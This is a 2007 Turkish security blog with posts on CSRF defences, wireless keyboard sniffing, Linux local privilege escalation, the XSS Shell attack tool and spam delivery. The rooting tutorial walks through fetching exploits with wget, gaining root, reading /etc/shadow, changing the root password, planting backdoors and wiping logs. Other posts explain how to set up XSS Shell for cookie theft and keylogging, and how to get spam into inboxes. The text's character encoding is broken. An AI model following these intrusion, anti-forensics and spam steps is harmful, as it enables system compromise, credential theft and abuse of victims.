syshoLe.com

CSRF Sald�r�lar� ve Korunma (B�l�m 2)

n3 — Sun, 02 Dec 2007 04:42:22 GMT

Korunma Y�ntemleri

3- Token (Anahtar)

Token kullan�lan en yayg�n ve en etkili g�venlik �nlemidir diyebiliriz..
Token (anahtar) sisteminin �al��ma mant��na g�re y�netici giri� formunda o anki oturuma g�re bir anahtar olu�turulur ve veritaban�na kaydedilir giri� yap�ld�ktan sonra giri� yapan ki�inin anahtar�, veritaban�ndakiyle kar��la�t�r�l�r e�er kar��la�t�rma uygunsa kullan�c� giri� formunu kullanarak giri� yapm�� demektir ve giri� izni verilir e�er uygun de�ilse oturum iptal edilir.

Tabi token tam bir g�venlik sa�lamaz ��nk� �nemli bir etkisi yoktur fakat her bir anahtar�n ge�erli oldu�u s�re aral�� iyi belirlenirse token sald�rgan i�in �nemli bir engel olu�turacakt�r.

Token ile ilgili �rnek kodlar� a�a��dad�r...

session_start();
$token = md5(uniqid(rand(),TRUE));
$_SESSION['token'] = $token;
$_SESSION['token_time'] = time();
?>

Token herhangi bir oturum degiskeni gibi yaratilmali

if (!isset($_SESSION['token']))
{
$_SESSION['token'] = md5(uniqid(rand(), TRUE));
}
?>

Token'� basit bir ko�ul ifadesi ile kontrol edin:

if ($_POST['token'] == $_SESSION['token'])
{
/* Valid Token */
}
?>

Token'�n ge�erlili�ini belirli bir zaman periyoduna k�s�tlamak, �rne�in d�rt dakika, g�venli�i art�racakt�r:

$token_age = time() - $_SESSION['token_time'];
if ($token_age <= 240)
{
/* Less than four minutes has passed. */
}
?>

-----------------------------------------------------------------

4- Server Destekli Korunma

Bahsetti�imiz korunma y�ntemlerini ve ileride bahsedece�imiz baz� ufak tefek korunma y�ntemlerini .htaccess dosyas� ile serverdan y�netebilirsiniz.
A�a��da �rnek kod yer almaktad�r..

RewriteEngine On
Options +FollowSymLinks

AddType application/x-httpd-php .php .xkill

# gelen istege gore engelleme

RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC]
RewriteRule ^(.*)$ deny.xkill [NC]

# referrer kontrolu

RewriteCond %{HTTP_REFERER} !^http://(.+\.)?yourwebsite\.com/ [NC]
RewriteRule .*\.(php|asp|jsp)$ deny.xkill [NC]

# remote file inclusion ataklarini onlemek icin dosya isimlerini # kisitlama

RewriteCond %{QUERY_STRING} ^(.*)('|<|>|/|\.a|\.c|\.t|\.d|\.p|\.i|\.e|\.j)(.*) [NC]
RewriteRule ^(.*)$ deny.xkill [NC]

--------------------------------------------------------------------

Bu kodlar sizin hayal g�c�n�ze g�re daha da geni�letilebilir.

5- CAPTCHA

Captcha basit�e, istek yapan kullan�c�n�n ufak bir resim i�inde verilecek g�venlik kodunu yazarak do�rulama yapmas�d�r.
iste�in i�inde bu kod yer alamayaca��ndan sald�rgan eli bo� d�nm�� oalcakt�r. Tabi burada kullan�lacak g�venlik kodunun nas�l bir kripto sistemiyle belirlenece�i, tekrar edip etmeyece�i �nemli ayr�nt�lar.

Referanslar :
http://devlog.info/2007/09/02/cross-sit ... ries-csrf/
http://www.0x000000.com/
http://www.olympos.org/belgeler/cross-s ... 93445.html

CSRF Sald�r�lar� ve Korunma (B�l�m 1)

n3 — Sun, 02 Dec 2007 04:16:07 GMT

Csrf (Cross-Site Request Forgeries) sald�r�lar� xss sald�r�lar�n�n z�t y�nl�s� gibi �al��r.
�rne�in bir siteye yetkili bir kullan�c� iziniyle girebildi�inizi d��nelim, bu siteye ba�l� aktif bir oturumunuz (session) olmas� gerekiyor. Ayn� anda sald�rgan�n sitesinde veya sald�rgan�n kod yerle�tirmi� oldu�u herhangi bir sitede (forum vs.) dola�t��n�zda sald�rgan yetkili oldu�unuz sitede ger�ekle�tirmeniz i�in size bir request g�nderebilir bu sayede yetkili oldu�unuz siteye sizin bilgisayar�n�zdan bir request (istek) gitmi� olacakt�r.
Daha a��klay�c� olmak gerekirse bir sitedeki 1 numaral� yaz�y� www.xxx.com/del.php?id=1 linkinden silebildi�inizi d��n�n.. Sizin bilgisayar�n�zdan giden istek bu yaz�n�n silinmesine yeterli olabilir.

Sald�r� Y�ntemleri

Bilinen en yayg�n csrf sald�r� y�ntemi, sald�rgan taraf�ndan yap�lan requestin size image taglar yoluyla gelmesidir.

�rne�in bir forumda

�eklinde yerle�tirildi�ini sand��n�z bir resime t�klad��n�zda bilgisayar�n�z script.php dosyas�na g�re bir istek ger�ekle�tirebilir.
Ayn� zamanda bu resimin boyutu 1x1 piksel olarak ayarland��ndan sizin bunun bir sald�r� oldu�unu farketmeniz zor olabilir. Bunun d��nda script.php dosyas� iframe olarakta yerle�tirilebilir her iki y�ntemde de kurban�n, bunun bir sald�r� oldu�unu anlamas� g��le�ecektir.

Korunma Y�ntemleri

1- GET Yerine POST Kullanmak

En s�k kullan�lan korunma y�ntemlerinden biri yetkili oldu�unuz sitedeki form tipini de�i�tirmektir. E�er formunuz GET isteklerini reddeip sadece POST isteklerini yerine getirirse bu tip ataklara b�y�k �l��de �nlem alm�� olursunuz fakat bu tek ba��na yeterli gelmeyecektir.
Sebebine gelirsek

gibi bir kod kullan�ld��nda g�nderilen request post olarak iletilecektir.

2- Referrer K�s�tlama

Bir ba�ka korunma y�ntemi gelen isteklerin sadece sitenin domaini �zerinden gelmesini istemektir.
Bunun dezavantaj� g�n�m�zde g�venlik amac�yla baz� kullan�c�lar�n referrer engelleyen taray�c� eklentileri kullanmas� veya baz� proxy sitelerinin bu referrerlar� engellemesi ya da de�i�tirmesi.
Bu y�ntem kullan�l�rsa sitenin belli bir kullan�c� kitlesininde siteye giri�i yasaklanm�� olacakt�r.

Yine de bu g�venlik �nlemini d��nenler i�in �rnek bir kod a�a��da veriliyor.

/**
* Check the users referrer on POST requests to make sure
* they come from the correct domain.
*
* @param array $whitelist An array of domains that should be
* allowed regardless of the current domain.
*
* @return boolean True if the referer is allowed, false otherwise.
*/
function check_post_referrer($whitelist = array()) {

// Only POST requests should be checked
if (strtoupper($_SERVER['REQUEST_METHOD']) != 'POST') {
return true;
}

$whitelist = (array)$whitelist;

#------------------------------
# Get the referrer host
#------------------------------

$ref_parts = @parse_url($_SERVER['HTTP_REFERER']);
$ref_host = false;

if ($ref_parts AND isset($ref_parts['host']) AND $ref_parts['host']) {
$ref_host = $ref_parts['host'];
}

// No referrer, default to true
if (!$ref_host) {
return true;
}

#------------------------------
# Get the current host and add
# it to the whitelist
#------------------------------

$host = false;

if ($_SERVER['HTTP_HOST']) {
$host = $_SERVER['HTTP_HOST'];
} else if ($_ENV['HTTP_HOST']) {
$host = $_ENV['HTTP_HOST'];
} else if ($_SERVER['SERVER_NAME']) {
$host = $_SERVER['SERVER_NAME'];
} else if ($_ENV['SERVER_NAME']) {
$host = $_ENV['SERVER_NAME'];
}

if ($host) {
array_unshift($whitelist, $host);
}

// If for some reason there are no allowed hosts,
// default to true
if (!$whitelist) {
return true;
}

#------------------------------
# Check the referrer against
# allowed domains
#------------------------------

$valid = false;

foreach ($whitelist as $check_host) {

$check_host = trim($check_host);

// Check with a space on each side to easily
// anchor it without using regex

if (stripos(" $ref_host ", " $check_host ") !== false) {
$valid = true;
break;
}
}

return $valid;
}

--------------------------------------------------------------------
�rnek kullan�m a�a��daki gibidir.

if (!check_post_referrer()) {
die('Invalid referrer');
}

// Process form
// ...

?>

--------------------------------------------------------------------

B�t�n bu �nlemlere ra�men sald�r�n�n spoof referrerdan gelebilme ihtimali g�z ard� edilmemelidir.

Wireless Keyboard Sniffing

n3 — Sun, 02 Dec 2007 02:50:31 GMT

Dreamlab ve remote-exploitin ortak �al��mas� olan yeni sald�r� tekni�i ge�enlerde duyuruldu.. Asl�nda 27mhz gibi d��k frekanslardaki bir wireless ba�lant�s�n�n sniff edilece�i zaten teorik olarak hemen hemen herkesin bildi�i bir �ey.. Ama birinin pratikte bunu g�stermesi g�zel olmu�..
Dreamlab�n bu konuda g�sterdi�i hassasiyet nedeniyle sald�r� ayr�nt�lar�na fazla de�inilmemi�..
Sald�r�yla ilgili makaleyi okurken benim en �ok dikkatimi �eken gelen tu� darbelerinin hi� bir kripto sisteminden ge�memesiydi. Her tu� darbesi i�in sadece 256 kombinasyonluk ufak bir koruma vard� ki bunu da �zellikleri ortalama olan bir bilgisayarla rahat�a yapabilirsiniz..
Biz y�rt�narak wep, wpa gibi uyduruk kripto sistemleriyle wireless teknolojisinin geli�emeyece�ini s�ylerken d�nya devi firmalar�n buna bile gerek g�rmemeleri komik..
Bunun d��nda bu klavyeleri kullanan firmalar�n ba��nda Microsoft ve Logitech gibi sekt�r devlerinin gelmeside d��nd�r�c�..
Nas�l olsa bizden ba�ka satan yok diyerek kullan�c� g�venli�ini bu kadar arka planda b�rakmak b�y�k �irketlerin hi� de�i�meyen hali..
Sadece bir haber oldu�u i�in fazla uzatm�ycam sadece �nemli bir haber oldu�u i�in payla�mak istedim..
Konuyla ilgili bir video..
http://www.remote-exploit.org/max/automated.html
Konuyla ilgili dreamlab'�n makalesi..
http://www.dreamlab.net/download/articl ... rities.pdf

Local Rooting

n3 — Fri, 05 Oct 2007 13:59:29 GMT

Uzun s�redir yo�unluktan dolay� d�k�man ekleyemem dolay�s�yla site sahipsiz g�r�nmesin diye daha �nce bir yerden buldu�um bir d�k�man� siteye ekleyece�im..
D�k�man local sistemleri rootlama y�ntemlerini �ok sade bir dilde anlat�yor..
Daha �nce bu tip rooting taktiklerine de�indik fakat genellikle konuyu �nceden bildi�inizi d��nerek �zet olarak ge�tik veya sald�r�n�n tek bir b�l�m�n� inceledik bunu yapmam�n sebebide sitenin teknoloji g�venli�i konusunda geli�tirilebilir d�k�manlar� i�ermesini istememdi..
Laf� uzatmadan d�k�mana ge�elim.. Bu arada d�k�man� yazan canberx'e de ayr�ca te�ekk�rler..
Konu: Linux Yerel Sistemi Rootlama
Yazar: canberX a.k.a nem0
Tarih: 15/04/2007 – 01:06
Kategori: Hacking - Linux

i�indekiler:
0x01 - Giri�
0x02 - Sistem Bilgilerini Toplama
0x03 - Da��t�ma G�re Exploit Bulmak ve Kullanmak
0x04 - Kernel S�r�m�ne G�re Lokal Exploit Bulmak ve Kullanmak
0x05 - Daemonlara G�re Exploit Bulmak ve Kullanmak
0x06 - Sistemden Dz B�rakmadan ��kmak
0x07 - Sonu� 0x01 - Giri�:
Merhaba arkada�lar. Bu yaz�mda sizlere lokalde eri�ebildi�imiz bir sistemi nas�l rootlar�z,nas�l
da��tabiliriz k�saca de�inece�im ve canl� bir �rnek ile peki�tirece�im.Ba�lamadan �nce sizlerde bulunmas�
gereken baz� �nemli exploitleri,programlar�n bir listesini verece�im (D�k�man�n en sonunda indirme linklerini
bulabilirsiniz.).

Lokal bir sistemi rootlamakla ilgili bir tuttorial haz�rlad�m evet ama peki lokal sisteme nas�l girece�im
diye biraz �eli�kiniz varsa,bu d�k�man� hi� okumay�n ve hemen gidin bir sisteme nas�l s�z�l�r biraz olsun
ara�t�r�n ;)

Lokalde y�ksek kullan�c� yetkisi(bkz: root,super user) i�in gerekli lokal exploitlerin bir listesi,bu t�r bir
listeye heryerde rastlayabilirsiniz.

2.4.17 -> newlocal, kmod, uselib24
2.4.18-19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21-22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5-8 -> krad, krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13-16 -> raptor, raptor2, h0llyshit, prctl

Kendi bilgisayar�n�zdan back-connect olabilmek i�in veya bir bindshell'e ba�lanabilmek i�in NetCat'i
�neriyorum...(not: PuTTy'de elinizde bulunsun...) Ayr�ca sistemi k�rd�ktan yani rootlad�ktan sonra �e�itli
rootkitlere,bindshell exploitlere,log temizleyecilere ve iste�inize g�re spam mail sender veya mass deface exploitlere de ihtiya� duyabilirsiniz.Baz� �nemli exploitler,scriptler: w4ck1ng bindshell Exploit, Log Cleaner,
Mass Script…

0x02 - Sistem Bilgilerini Toplama:
Evet bilindi�i �zere sistemimiz bir linux sistem.Bir Linux sistemde ilk �nce sistem �zerinde nMap veya
herhangi bir a� tarama program�yla bir tarama yapal�m ve ��kan sonu�lar� sistemin IP'siyle birlikte not alal�m
bir kenarda kals�n ��nk� ilerleyen zamanlarda bunlar bize yard�mc� olacak.Daha sonra kernel versiyonunu
��reniriz.

��nk� �nce kernel hacklenmeye �al��l�r,e�er kernel hacklenemezse bu sefer sistem �zerindeki kurulu
daemonlar�n a��klar� denenir.Her neyse konumuza d�nelim.�imdi sistemin kernel versiyonunu ��renelim.cat
/proc/version,cat /etc/issue veya uname -r gibi bir komutla kernel versiyonunu alabiliriz(uname komutunda -a
parametresi ile detayl� bilgiye ula�abilirsiniz.). cat etc/issue;cat/version
Welcome to SuSE Linux 9.3 (x86-64) - Kernel \r (\l).
Linux version 2.6.16.20-060620b (root@buildd-amd64) (gcc version 3.3.5 (Debian 1:3.3.5-13)) #1 SMP Tue Jun 20 14:53:44 CEST 2006

Evet komutun ��kt�s� kar��m�za geldi ve bak�yoruz sistemin kernel versiyonu 2.6.16.20-060620b ve
da��t�m olarak SuSE 9.3 kullan�yor.Kernel 2006 y�l�nda derlenmi�.�imdi 2 se�ene�im var.Ya kernel versiyonuna
g�re lokal exploit arayaca��m,ya da da��t�m s�r�m�ne g�re(biliyorsunuz ki �o�u linux da��t�m�nda baz� a��klar
olabiliyor.).

0x03 - Da��t�ma G�re Exploit Kullanma:
Dlk �nce da��t�ma g�re bir a��k aramay� tercih ediyorum ben.Herhangi bir 0day veya Advisory sitesine
gidip da��t�m ad�n� ve versiyonunu yazarak arat�yorum(ben burda milw0rm'� tercih ettim.).Evet bir exploit
buldum.Exploitimin ad� bu:

SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0

Bu exploit SuSE 9.3 ve 10.0 sistemlerde root seviyesinde bir kullan�c� yarat�yor.Exploitimi .sh format�nda
kaydedicem(.sh bin/bash programlaman�n dosya uzant�s�d�r.).Daha sonra uzaktaki bir adrese att�m
exploitimi.�imdi sisteme �ekmem laz�m.Bunun i�in wget komutunu kullanabilirim(ayr�ca lynx,get,fetch,curl gibi
komutlarda var.).

wget http://xxxxxxxx.xxx/xxxxxx/suse9-3.txt
--21:53:34-- http://xxxxxxxx.xxx/xxxxxx/suse9-3.txt
=> `suse9-3.txt'
Resolving http://xxxxxxxx.xxx... 208.53.xxx.xx
Connecting to http://xxxxxxxx.xxx|208.53.xxx.xx|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13,253 (13K) [text/plain]

100%[====================================>] 13,253 --.--K/s

21:53:40 (105.71 KB/s) - `suse9-3.txt' saved [13253/13253]

Evet exploitim geldi.Onu mv komutuyla .sh format�na �evirece�im.Bunun i�in mv suse9-3.txt suse9-3.sh
komutunu uyguluyorum.Ard�ndan dosyaya chmod 4777 suse9-3.sh komutuyla �al��t�rma ve yaz�labilme yetkisi
veriyorum.Son olarakta ./suse9-3.sh komutuyla �al��t�r�yorum.
E�er sistem patchsiz ise root yetkisine sahip kullan�c�m�za olu�acakt�r.

/bin/su file is not setuid root :(
/usr/bin/chfn file is not setuid root :(

Evet hata verdi anla��l�yor ki sistem pacthlenmi�.�imdi o zaman 2.elternatife ge�ece�im.Yani Kernel
versiyonuna g�re bir a��k bulup sistemi o �ekilde k�raca��m. 0x04 - Kernel S�r�m�ne G�re Lokal Exploit Kullanma:
Hat�rl�yorsan�z kernel versiyonu 2.6.16-20-060620b idi.Bunun i�in lokal kernel exploit listeme bak�cam
ve uygun exploiti se�ece�im.raptor, raptor2, h0llyshit, prctl isimli exploitler bu versiyona uygunmu�.Dlk �nce
h00lyshit'i deneyece�im.Yine wget komutuyla exploitimi �ektim.h00lyshit'in usage k�sm�na bakarsan�z
g�r�rs�n�z zaten kullan�m� �u �ekildir.

./h00lyshit file

Yukar�da g�r�ld�� gibi file isimli dosya 100 MB'tan b�y�k olmal�d�r.O zaman cd /tmp komutuyla tmp
dizinine ge�icem,neden tmp dizini diye sorarsan�z,tmp dizini yaz�labilir bir dizindir.100 MB'dan b�y�k bir dosya
olu�turmak i�in dd komutunu count ile birlikte kullan�yoruz.

dd if=/dev/zero of=canberX.dat bs=1024k count=130

Yukar�daki komut ile 1024KB olan bir dosya yaratt�k ve onu 130 kere count ederek 130 MB'l�k bir dosya
elde etmi� olduk.Dsteyenler dosya boyutunu ��renmek i�in du -h dosyaAdi komutunu kullanabilirler.Her neyse
exploitimi �al��t�r�yorum: chmod 4777 h00lyshit;chmod 4777 canberX.dat
./h00lyshit /tmp/canberX.dat;id
Segmentation Fault
uid=33(www) gid=33(www) groups=8(www)

Evet bak�yoruz Segmentation Fault hatas� verdi.Kernele i�lemedi exploit.Ama y�lmak yok ba�ka bir tane
deniyoruz.�zellikle bu t�r bir kernele sahip sistem se�tim ki piyasada 2-3 RFI Bug kullan�p site deface edip
kendini ilah zanneden baz� arkada�lar�n �srarla 2.6.* 2006 Updateli kernel k�r�lmaz diye �ne s�rd�kleri tezlerini
��r�tmek i�in :) Bu sefer prctl isimli exploiti �ekiyorum sisteme.Ayn� i�lemleri bu exploitede uyguluyoruz.

chmod 4777 prctl
./prctl;id
uid=0(root) gid=0(root) groups=8(www),2523(psaserv)
whoami
root Aaa,o da ne,sistem sen root'sun dedi :) Demek oluyor ki pcrtl isimli exploitimiz lokalden sistemi k�rmaya
yard�mc� oldu.�imdi bakal�m uptime'lar�na ve sistemde ki kullan�c�lara,�ifrelere vs...

uptime
6:47pm up 1 day 5:11, 0 users, load average: 0.12, 0.17, 0.18

En son 1 g�n �nce kullan�lm�� sistem.�uan da hi� kullan�c� yokmu�.Burada ki kullan�c�dan kast�m�z
admin. Hemen /etc/passwd ve /etc/shadow dosyalar�nda ki root �ifrelerine bak�yoruz...

cat /etc/passwd | grep root
root:x:0:0:root:/root:/bin/bash

cat /etc/shadow | grep root
root:$2a$10$hxQEuGI3cVPMH4PJbQ07IOf1eetXDpl37ELK3r7b1U9M8oaQWJNIq:13332:0:10000::::Evet root kullan�c� hesab�n�n bilgilerini g�rebiliyoruz.Dstersek root kullan�c�s�na ait �ifreyi de�i�tirebiliriz.
useradd veya adduser komutuyla bir kullan�c� ekleyebilirsiniz sisteme.Ayr�ca passwd komutuyla istedi�iniz
kullan�c�ya ait �ifreyi de�i�tirebilirsiniz.

passwd root
Enter New Password:
Re-Enter New Password:
Password Changed!

Tamamd�r yukar�dakine benzer bir ad�mla root �ifresini de�i�tirdik.Eminim admin sistemine girmeye
�al��t��nda bize �ok k�f�r edecek :) Ayr�ca sistemde bir arka kap� b�rakmay� unutmay�n...

0x05 - Daemonlara G�re Exploit Bulmak ve Kullanmak:
Evet geldik sistemde ki 3.alternatif a�amalardan birine.Oldu ki ne kerneli k�rabildiniz,ne de da��t�ma
g�re bir a��k bulup sistemi k�ramad�n�z ve �yle ortada kald�n�z.O zaman sistemde kurulu olan Daemon
dedi�imiz sistemin i�leyi�inde rol alan programlar i�in yaz�lm�� a��klar� 0day/Advisory sitelerinden bulup
kullanmam�z gerekir.

Daemonlara ait exploitlerin en �nemli �zellikleri remote exploitlerde olabilmeleridir.Peki bu ne demek?
Yani siz bir mysql,proftpd,samba,Apache,PHP gibi debianlarda ki a��klar sayesinde sistem �zerinde uzaktan
haf�za ta�mas� yaratarak kod �al��t�rabilirsiniz.Bunun �ok b�y�k avantaj� var.Bu nedenle bu t�r debianlarda ki
a��klar genelde public edilmez yani priv8 olarak tutulur.Adam istedi�i gibi kullan�r,daha sonra �reticiye bildirir
a��k i�in yama ��kmadan 1 g�n �nce 0day sitelerine da��t�r.Genelde underground'da i�ler bu �ekilde
i�liyor.Malesef �lkemizin m�thi� hackerlar� emanete pek sad�k kalm�yorlar yani ak�llar� s�ra kendi milletlerine
yararlar� dokunuyor neyse buras� tart��l�r...

Ben Apache 1.3.33/1.3.34 s�r�m� i�in �ok g�zel bir lokal exploit buldum.Debian tabanl� sistemlerde
root olmaya sa�l�yor.Bunun a��klamas�n� yapmayaca��m biraz fazla uzad� konu.Zaten eminim exploit kullanma
konusunda bir fikriniz var art�k.Zaten e�er bir fikriniz yoksa ya gidin okuyun ��renin bu d�k�man� �yle uygulay�n ya da kendinizi camdan a�a�� at�n :)

0x06 - Sistemden Dz B�rakmadan ��kmak:
Evet geldik son a�amaya.Art�k o g�z�m�zde b�y�tt��m�z root yetkisi bizim gibi de�ersiz bir adam�n
elinde harap oluyor.Belki birilerinin �ok de�er verdi�i web serverlar�,ki�isel bilgisayarlar veya web siteleri tek
bir komutumuza bak�yor(rm -rf / sak�n evde denemeyin :P).Ee yapt�kta ne oldu.Tamam y�ksek yetki
kazanabildik.

Ama unutmay�n ��karken mutlaka sistemde bir iz b�rakm�� olabilirsiniz.Bunun i�in m�mk�n oldu�unuca
ayn� dizinlerde �al��n,sisteme ba�lan�rken bir proxy kullan�n ve i�iniz bittikten sonra kulland��n�z materyalleri
silin.Bunun i�in log temizleyen scriptler var.Bunlar�n mant�� basittir.

rm -rf /var/logs

Yukar�daki gibi basit komutlarla belirlenmi� olan log dizinlerindeki dosyalar� siler.En son olarakta /tmp
dizini gibi ge�ici dosyalar�n oldu�u dizini silebilirsiniz.Log temizleyen bir scriptti d�k�man�n sonundaki
download adreslerinde bulabilirsiniz.Ayr�ca loglar� temizlemeden �nce sistemde bir arka kap� b�rak�rsan�z ilerisi
i�in iyi olur.Zaten root �ifresini de�i�tirmi�tik ama her t�rl� �ey i�in bir sahte kullan�c� veya hortlayacak bir
remote shell b�rakmak bizim i�in iyi olur.Bunun i�in bir rootkit veya bindshell exploitini kullanabilirsiniz... 0x07 - Sonu�:
Sonu� olarak bu d�k�man ile bir �ekilde eri�im sa�lad��m�z bir sistemde lokal s�radan bir kullan�c� iken
nas�l en y�ksek yetkiye sahip bir kullan�c� olduk onu g�rd�k.Elimden geldi�ince elimdeki sisteme ait a��klar�
kullanarak demonstrate(T�rk�e kar��l�� biraz anlams�z o y�zden bu terimi kulland�m) etmeye �al��t�m.

Umar�m mant�k ve y�r�t�lecek yol anla��lm��t�r.Unutmamak gerekirki k�r�lamayacak bir sistem yoktur(bu
laf son zamanlarda bileninde bilmeyeninde diline sak�z oldu ama kapan�� bununla yapal�m bu seferlik :) ).

Dyi Hackingler...

Te�ekk�rler:
D�k�man� haz�rlarken bir tak�m isteklerimi yerine getiren,bana bulmakta zorluk �ekti�im scriptleri bulan ve
d�k�man� test eden arkada��m e8,benimle t�m bilgisini payla�an m0liver,yanl��l�kla kalbini k�rd��m
h4ckinger ve �uan ad� akl�ma gelmeyen t�m arkada�lar�ma te�ekk�rlerimi sunar�m…

Referanslar:
PsyCash - Bir Hackin Anatomisi
Ebixad - System Rooting

Download Linkleri:
NetCat for WINNT - http://vulnwatch.org/netcat/nc111nt.zip
nMap for WINNT - http://download.insecure.org/nmap/dist/ ... -win32.zip
w4ck1ng Bind Shell Exploit - http://www.w4ck1ng.com/board/showthread ... l-832.html
Mass Script - http://upload2.net/page/download/cHq6Zx ... s.rar.html
Log Cleaner - http://upload2.net/page/download/TaS07H ... x.rar.html
Lokal Exploitler - http://m0liverlab.by.ru/exploitz/rootexploits.rar

Xss Shell

n3 — Sat, 21 Jul 2007 13:20:07 GMT

Xss Shell Ferruh Mavituna'n�n bri projesi, genel anlam�yla xss ataklar�n� daha kolay kontrol etme ve tek seferde birden fazla kurbana birden fazla komut vermenize yar�yor.
Scriptin bize sa�lad�� yararlardan baz�lar� ddos, cookie alma, keylogger ve her t�rl� js komutlar�n� i�letebilmek...
Kullan��l� ve xss sald�r�lar�na yeni bir boyut kazand�ran bu sistem Ferruh beyin �abalar�yla h�zla geli�ece�e benziyor.

Bu yaz�da kurulumundan kullan�m�na ve s�k kar��la��lan sorunlara de�inece�iz.

�lk olarak kuruluma bakal�m..

�ncelikle http://www.portcullis-security.com/ adresinden xss shelli indiriyoruz.

Yeni versiyonlar Xss Tunneling yaz�l�m�yla beraber geliyor bu yaz�l�ma daha sonra de�inece�iz �imdilik ihtiyac�m�z olan xss shell.

Dosyalar� Asp hostumuza at�yoruz.
Kendi bilgisayar�n�za iis kurarak scripti kendi bilgisayar�n�z yard�m�yla �al��t�rabilirsiniz bu konuyla ilgili bir videoyuda
http://ferruh.mavituna.com/makale/xss-s ... all-video/
adresinden izleyebilirsiniz.

Dosyalar� att�ktan sonra dikkat etmek gereken konulardan biri db dosyam�za yani shell.mdb dosyas�na yazma izni olup olmad�� bu dosyan�n yazma izni yoksa script �al��mayacakt�r.
Daha sonra admin klas�r�n�n i�indeki db.asp dosyas�n� a�arak "w00t" olan �ifre k�sm�n� istedi�iniz bir �ifre olarak de�i�tirmek.
Yine db.asp dosyas�n�n i�indeki db yolunu g�steren
C:\XSS Shell\XSSShell-060\db\shell.mdb
sat�r�n�da kendi hostunuzdakine g�re ayarlamal�s�n�z.

Son olarak xssshell.asp dosyas�n� a�arak
http://www.xssshelltest.com:60000/
yazan k�s�ma kendi scriptimizin adresini veriyoruz.

B�ylece kurulumu tamamlam�� olduk �imdi tek yapmam�z gereken kurban�m�z� bu linke y�nlendirmek.

Bunu yapabilmek i�in herhangi bir sayfadan
http://www.example.com/q="> src="http://[site]/xssshell.asp">
linkini verirseniz kurban sizin istedi�iniz adrese y�nlenecektir.
Yukar�daki kod genellikle forum, portal gibi scriptlerde engellendi�i i�in exploit sitelerinde istedi�iniz scriptin xss a��n� aratarak bu a��k yard�m�yla kurban�n�z� kendi xssshell.asp sayfan�za y�nlendirmeniz daha kolay olacakt�r.

Bunun d��nda

kodunu kendi haz�rlad��n�z herhangi bir sayfan�n bir yerine koydu�unuz takdirde bu sayfay� a�an herkes direkt olarak sizin emriniz alt�na girecektir.
Kurban sizin haz�rlad��n�z sayfada kald�� s�rece
http://[site]/admin
adresinden kurban� kontrol edebilirsiniz.

�u an i�in bilinen buglar
Keylogger�n internet explorer �zerinde �al��mamas� ve scriptin Konqueror taray�c�s�nda i�e yaramamas�.

Kurulum ya da kullan�mda olu�an hatalar� buradan bana ya da www.ferruh.mavituna.com adresinden Ferruh beye ula�t�rabilirsiniz.

Spam ve �pu�lar�

n3 — Tue, 17 Jul 2007 20:14:44 GMT

�ahsen spama kar�� olmamakla birlikte a�a��daki verece�im bilgilerle spam yapanlar domain adresleri spam listelerine al�nd�� takdirde arama motorlar�nda alt s�ralara d��ecektir. Olay�n hukuki boyutunu kar��t�rm�yorum bile :)

G�nderece�iniz maillerin h�zl� ve g�venli olarak ula�mas� i�in kendi bilgisayar�n�zdan spam yapmay� anlataca��m.

E�er ba�lant�n�z yetersizse ya da u�ra�mak istemiyorsan�z ve bir host �zerinden spam yapmak istiyorsan�z server kurulumunu ge�erek sadece gerekli testleri yapmal� ve server �zerinden kullanabilece�iniz uygun yaz�l�m� bulmal�s�n�z.

Tabi server�n�z �zerinden mail g�nderirken hosting firman�z�n size verdi�i yetkileride ��renmek gerekir. �rne�in baz� firmalar�n g�nl�k mail atma limiti ya da bir seferde belli say�da mail atma gibi limitleri vard�r.

�imdi kendi bilgisayar�m�zdan mail atma i�lemi i�in smtp server kurulumuna ge�elim.

Basit�e bir smtp server kurmak i�in mdaemon yaz�l�m�n� indirerek kurman�z yeterli olacakt�r.

mdaemon yaz�l�m�n�
http://www.altn.com/Products/MessagingS ... s/MDaemon/ adresinden �ekebilirsiniz.

E�er yaz�l�m kullanmadan kurulumu yapmak isterseniz

Ba�lat>Ayarlar>Denetim Masas�>Program ekle kald�r

sekmelerini takip ederek

Windows Bile�enleri ekle/kald�r b�l�m�nden

Internet Information Servicesin i�indeki SMTP server sekmesini se�erek kurulumu yapabilirsiniz.

Elle kurulum yaparsan�z giri� ayarlar�n� kendi bilgisayar�n�za ya da belli bir kullan�c� ad� �ifre ile yapt�rman�zda yarar var aksi takdirde spammerlar�n hedefi olabilirsiniz.

Kurulum bittikten sonra �nemli ayr�nt�lardan biri de mail ataca��n�z yaz�l�md�r.

Mailleri atmak i�in fazla kullan�lmayan profesyonel bir yaz�l�m kullanman�z maillerinizin inboxa d��mesinde etkili olacakt�r.

Benim tavsiyem paral� yaz�l�mlardan bir tane alman�z ya da en az�ndan bunlar�n demolar�ndan birini kullanman�z olacak.

Bu i�lemleri bitirdikten sonra art�k spam yapmaya ba�layabiliriz �imdi maillerimizin inboxa d��mesi i�in gerekli t�yolar� s�ralayal�m.

�lk olarak spam yapaca��n�z server�n spam listelerinde olup olmad��n� kontrol edin bunu yapmak i�in
http://www.dnsstuff.com/tools/ip4r.ch?ip=xx.xx.xxx.xxx adresini kullanabilirsiniz. (x karakterleri yerine spam yapaca��n�z server�n ip adresini yazman�z gerekiyor)

E�er b�t�n listelerden not listed yaz�s�n� g�rd�yseniz sorun yok demektir.

Ayr�ca maillerin inboxa d��mesini etkileyen en �nemli etkenlerden biri ip adresinizin bir domainle ili�kilenmi� olmas�d�r.

Bunu yapmak i�in sabit ip adresiniz varsa bir domain alarak kendi bilgisayar�n�za y�nlendirebilirsiniz, sabit ip adresiniz yoksa no-ip.com gibi sabit ip hizmeti veren sitelerden ip adresinize ba�l� bir sabit subdomain alarak y�nlendirmeyi bu adreslere yapabilirsiniz.

Ip adresinizin bir domainle ili�kili olup olmad��n�

http://www.dnsstuff.com/tools/ptr.ch?ip=xx.xx.xxx.xxx adresinden kontrol edebilirsiniz.

